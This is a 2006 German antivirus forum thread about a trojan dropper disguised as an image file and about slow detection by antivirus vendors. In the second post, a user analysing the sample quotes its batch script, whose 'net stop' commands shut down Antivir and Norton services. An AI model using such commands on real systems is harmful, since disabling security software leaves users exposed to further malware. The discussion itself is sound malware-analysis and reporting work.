 Trojan-Dropper.Win32.MultiJoiner.13.j, nicht Wert eingepflegt zu werden? |
Willkommen, Gast ( Anmelden | Registrierung )
  25.04.2006, 02:36
Beitrag
#1
|
|
 Ist unverzichtbar  Gruppe: Freunde Beiträge: 4.018 Mitglied seit: 27.03.2004 Mitglieds-Nr.: 522 Betriebssystem: Windows 11 Pro Virenscanner: F-Secure IS Firewall: Router, Windows-Firewall  |
Vor gut 3 Wochen habe ich mal eine vermeintliche Bilddatei auf Jottis und Virustotal scannen lassen und anschließend an BitDefender gesandt.
Bis heute hat sich dort und auch bei einigen anderen anscheinend nichts getan. Frage daher: Ist so ein Schädling es nicht Wert eingepflegt zu werden, oder gibt es im Moment einfach nur zu viel andere Malware die eingepflegt werden muss?   Kaspersky hat den Trojan-Dropper übrigens schon am 10.März entdeckt. -------------------- Gruß
Stefan |
 |
 
|
 |
Antworten
|
25.04.2006, 12:35
Beitrag
#2
|
|
 Ist unverzichtbar  Gruppe: Mitglieder Beiträge: 14.840 Mitglied seit: 05.07.2004 Mitglieds-Nr.: 1.143 Betriebssystem: Windows 7 SP1 (x64) Virenscanner: NIS2013 Firewall: NIS2013 |
hab mir die Malware von Stefan mal schicken lassen .
die 314kb com-datei wird hier selbst nicht erkannt aber wenn ich sie im Gast-modus (wo ich keinerlei rechte besitze) starte werden einige sachen daraus gestartet ,darunter eine schmuddlige bilddatei und 2 rar-sfx dateien. eine rar-sfx datei wird sofort erkannt als : QUOTE Quelle: danz6.exe Klicken Sie hier, um weitere Informationen über dieses Risiko zu erhalten: Backdoor.Trojan Durchgeführte Aktion: Gelöscht bei der zweiten kommt eine rar-installer GUI die ich aber abgebrochen hatte. wenn ich jedoch da reinschaue kommt eine stille informationsanleitung zum vorschein, das heisst das rar-sfx hätte sich im silentmodus starten sollen.  darunter auch eine batch-datei die weitere malware installieren soll und ...... QUOTE @echo off start /min cmd /c net stop "Antivir Service" 2>nul start /min cmd /c net stop antivirService 2>nul ################# start /min cmd /c net stop "Antivir Scheduler" 2>nul ######dfgsdafaag start /min cmd /c net stop navapsvc 2>nul ####start /min cmd /c net stop jkfdlkjfdlkjfdslkg 2>nul start /min cmd /c net stop "AntiVir PersonalEdition Classic Service" 2>nul exit Antivir killen sollte  p.s. die *.com selbst hab ich an symantec eingeschickt . Der Beitrag wurde von bond7 bearbeitet: 25.04.2006, 12:51 -------------------- Der Beitrag wurde von Unbekannt bearbeitet: Morgen, 06:00
System: Intel C2Q9550 , Gigabyte GA-P35-DS3L , 8GB Mushkin , XFX HD6670 , Samsung SATA2 (750GB, 500GB, 2x 1TB) , ATAPI & NEC DVDRAM , TFT Samsung T260 26" , Case Lian Li PC-7FNW , Corsair Accelerator SSD 60GB "Irgendwelche Politiker mögen irgendwann mal einen cleveren Gedanken haben, aber in der Regel plappern sie nur die Agenda der Lobbyisten nach." Lobbyismus für Dummies : http://www.youtube.com/watch?v=P_QVyOGnIrI Einschätzung zur Wikileaks Lage : http://www.youtube.com/watch?v=HVJAUECLdo8 , http://www.youtube.com/watch?v=gWR4VAyva6s |
|
|
|
Beiträge in diesem Thema
Stefan Trojan-Dropper.Win32.MultiJoiner.13.j 25.04.2006, 02:36
JFK QUOTE(Stefan @ 25.04.2006, 03:35)Frage daher:... 25.04.2006, 04:16 Domino Andererseits ist bei den meisten gerade polipos di... 25.04.2006, 11:00 skep Ich hab hier auch so ein Kandidaten der nur von ei... 25.04.2006, 11:23
Lucky QUOTE(bond7 @ 25.04.2006, 13:34)hab mir die M... 25.04.2006, 13:58 drweb-online Bitte die Datei an vms(at)drweb.com senden mit dem... 25.04.2006, 13:35 bond7 ist abgeschickt , das passwort zum öffnen liegt be... 25.04.2006, 13:40 bond7 QUOTEauch mit nur Gastrechten, kan man sich was ei... 25.04.2006, 14:33 Stefan Na wie ich sehe scheint ja wenigstens einer der ac... 25.04.2006, 17:56 skep Den von mir weiter oben erwaehnten Backdoor erkenn... 25.04.2006, 18:02 Kyu Was bitdefender angeht gibts zwei möglichkeiten. ü... 25.04.2006, 20:12 Stefan QUOTE(Kyu @ 25.04.2006, 21:11)welchen weg has... 25.04.2006, 20:27 Kyu QUOTEdie eingesandten verdachtsfälle über das prog... 25.04.2006, 20:42 Stefan Wenn ich an die letzten Einsendungen an "supp... 25.04.2006, 21:00 blueX @stefan
@skep
@bond
http://www.rokop-security.de... 25.04.2006, 21:27 Kyu na dann mal sehen wie lang es noch dauert =) 25.04.2006, 21:35 Stefan Übrigens bei Dr.Web hat man sich Mühe gegeben.
Der... 26.04.2006, 22:33 rock ich frag mich schon seit langem wie diese uploadsc... 27.04.2006, 09:16 rock hier detto! mc afee knallt sofort an! zwar... 27.04.2006, 09:33 drweb-online @rock:
Kannst Du mal bitte die Viren zu vms(at)drw... 27.04.2006, 10:10 rock edit: abgeschickt! 27.04.2006, 10:20 Kyu der name der .exe sagt mir zwar nix, aber du kanns... 27.04.2006, 16:13 rock könnt ihr euch noch an das thema von zottel oder z... 27.04.2006, 16:42 blueX Warum schickst du das Zeug nicht ein? 27.04.2006, 16:46 rock was glaubst du hab ich die letzten jahre immer gem... 27.04.2006, 16:53 blueX Hast du denn die Datei winsis32.exe auch abgeschic... 27.04.2006, 16:59 drweb-online @rock:
Wenn Du mir (Dr.Web) einen Gefallen tun wi... 27.04.2006, 17:13 rock QUOTE(drweb-online @ 27.04.2006, 18:12)@... 27.04.2006, 17:19 drweb-online @rock:
nichts entpacken,... das macht unsere Tech... 27.04.2006, 17:43 Kenshiro ...wird immer gefährlicher mit diesen Viren... 27.04.2006, 18:33 Scrapie QUOTE(Kenshiro @ 27.04.2006, 19:32)...wird im... 27.04.2006, 21:50 rock hmm..wieder son ergebnis wo ich mich sofort ausken... 28.04.2006, 10:26 rock na wer sagts denn...schon der erste kleine asterix... 28.04.2006, 10:33 rock schon ein bissl besser
STATUS: FINISHEDComplete ... 28.04.2006, 10:37 2cool Jo, da wird so einiges nicht entdeckt, ist aber di... 28.04.2006, 12:04 Anubis QUOTE(2cool @ 28.04.2006, 13:03)Jo, da wird s... 28.04.2006, 12:07 2cool QUOTE(Anubis @ 28.04.2006, 13:06)Aber bei NOD... 28.04.2006, 12:18 rock auch antivir scannt mit heuristik und bitdefender ... 28.04.2006, 12:13 Anubis Wäre es technisch denn nicht machbar, genau eine s... 28.04.2006, 12:20 rock schade das sie trendmicro nicht miteinbeziehen in ... 28.04.2006, 12:22 drweb-online kann mir nicht jemand mal die winsis32.exe und mai... 28.04.2006, 12:46 rock ich habs dir jetzt nocheinmal auf den ersten serve... 28.04.2006, 16:22 bond7 wie hastn du das zusammenbekommen rock, hast du be... 28.04.2006, 16:24 drweb-online @rock
Es wurde schon so einiges hinzugefuegt heute... 28.04.2006, 16:35 rock die mailpv.exe findest du hier:
http://www.rokop-... 28.04.2006, 17:00 drweb-online Ha,...hast Recht,... waren zu viele Files
Sollte... 28.04.2006, 17:10 rock QUOTE(bond7 @ 28.04.2006, 17:23)wie hastn du ... 29.04.2006, 09:41 rock jetzt hab ich auch endlcih das thema gefunden wo d... 29.04.2006, 09:55 drweb-online QUOTE(rock @ 29.04.2006, 10:54)...ob da echt ... 29.04.2006, 10:24 rock umpf! das hätt ich mir sparen könne...wenn i... 29.04.2006, 10:53 Stefan Also BitDefender, eTrust, McAfee und Symantec, so ... 03.05.2006, 18:36 rock QUOTE(Stefan @ 03.05.2006, 19:35)Also BitDefe... 04.05.2006, 16:00 Scrapie Tag
Nicht nur bei v1.3 siehts so besch**** aus, a... 03.05.2006, 19:35 Manu Viel kurioser ist das folgende Ergebnis:
Das Teil ... 03.05.2006, 20:08 Stefan Ohne Worte. 03.05.2006, 21:10 rock tja...scheinbar wollen manche auch nicht bei schär... 04.05.2006, 06:19 Stefan Ich würde ihn dir ja gern schicken, wenn du mir ei... 04.05.2006, 18:43 rock ja schicks einfach mal an .....
danke! 04.05.2006, 19:38 Stefan QUOTE(rock @ 04.05.2006, 20:37)ja schicks ein... 07.05.2006, 11:19 bond7 QUOTEQuelle: Manuelle Prüfung
Risikokategorie Hac... 05.05.2006, 00:13 rock nö! leider nicht.
und ich kanns ncihtmal an m... 07.05.2006, 11:24 Stefan QUOTE(rock @ 07.05.2006, 12:23)so , also....i... 07.05.2006, 12:07 rock aber es sieht bei den anderen immer noch so aus: (... 07.05.2006, 11:31 bond7 QUOTESymantec 8.0 05.07.2006 no virus found
http... 07.05.2006, 11:34 rock hmm...ist das gleich? oder wie? wie heist den der ... 07.05.2006, 11:48 bond7 QUOTEhmm...ist das gleich?
Nicht ganz.
QUOTEwie h... 07.05.2006, 11:55 rock QUOTE(bond7 @ 07.05.2006, 12:54)doch tut er h... 07.05.2006, 11:57 rock nanu...wo kann man bei mc afee hochladen?
ja...d... 07.05.2006, 12:20 Stefan QUOTE(rock @ 07.05.2006, 13:19)nanu...wo kann... 07.05.2006, 12:21 rock boah!...da muss man ja ein buch schreiben....u... 07.05.2006, 12:23 Stefan So, eine Antwort hat es schonmal von McAfee gegebe... 08.05.2006, 18:46 rock hmm...stand da nicht was von Multidropper NB oder ... 08.05.2006, 18:51 Stefan Nö.
Einzige Bezeichnung = siehe Fettgedrucktes ob... 08.05.2006, 18:56 rock na abarten....bin auf arbeit....kann mich nur erin... 08.05.2006, 19:00 rock @ stef, and interests...
hmm..also bevor ich ins ... 09.05.2006, 06:06 rock so...update ist da...erkennung OK!
MultiDropp... 10.05.2006, 05:40 rock übrigens...stefan...hast du Bitdefender was geschi... 10.05.2006, 11:57 Stefan QUOTE(rock @ 10.05.2006, 12:56)übrigens...ste... 10.05.2006, 18:43 rock das ist aber seltsam...eTrust kennt es ja eh zu ke... 10.05.2006, 12:02 Domino Erkennen und eine Signatur erstellen ist etwas and... 10.05.2006, 13:05 rock eTrust = Win32/MultiDropper 11.05.2006, 05:51 rock alles geht heut verdammt schnell...absendungen wer... 11.05.2006, 07:39 rock hmm...hab den Multidropper mal gestartet. es dropp... 11.05.2006, 08:37 rock aber stefan...bitdefender findet wenigstens eine d... 11.05.2006, 08:49 Stefan Ist jetzt nur die Frage, ob es sich bei der nichtv... 11.05.2006, 08:55 rock ich möcht ja auf das hinauf garnicht wissen...wiev... 11.05.2006, 09:25 rock sophos ist ganz ein schlauer...meldet mir zurück w... 11.05.2006, 10:30 Kyu Hallo =)
mein Erfahrungsbericht dazu.
-Datei um... 11.05.2006, 15:03 Stefan QUOTE(Kyu @ 11.05.2006, 16:02)Wie es zum unte... 11.05.2006, 15:55 rock morgen..
hab mir in der früh noch die mühe gemac... 11.05.2006, 16:05 Stefan QUOTE(rock @ 11.05.2006, 17:04)bitdefender an... 11.05.2006, 16:07 Rios Also ich finde es schade wie Bitdefender hier verw... 11.05.2006, 16:52 Stefan Anscheinend hat der Bitdefender-Support sein Wort ... 11.05.2006, 21:39 Kyu awa schwarze liste... die av-hersteller leben doch... 11.05.2006, 22:51 rock edit. stimmt....da habens zwei namen in beiden eng... 12.05.2006, 07:31 rock ähmm..stefan...will dir ja nicht ganz die laune an... 12.05.2006, 11:25 Stefan QUOTE(rock @ 12.05.2006, 12:24)ähmm..stefan..... 13.05.2006, 08:02 Rios Hallo Rock,
steht doch schon in deiner Liste auf ... 12.05.2006, 15:47 Heike Ich habe aus Fun mal ein paar "alte" RAT... 12.05.2006, 17:22 |
6 Besucher lesen dieses Thema (Gäste: 6 | Anonyme Besucher: 0)
0 Mitglieder:
| Vereinfachte Darstellung | Aktuelles Datum: 21.05.2025, 08:24 |
Original Style by Bo Derek, further improvements and board management by Style Biz | Webdevelopment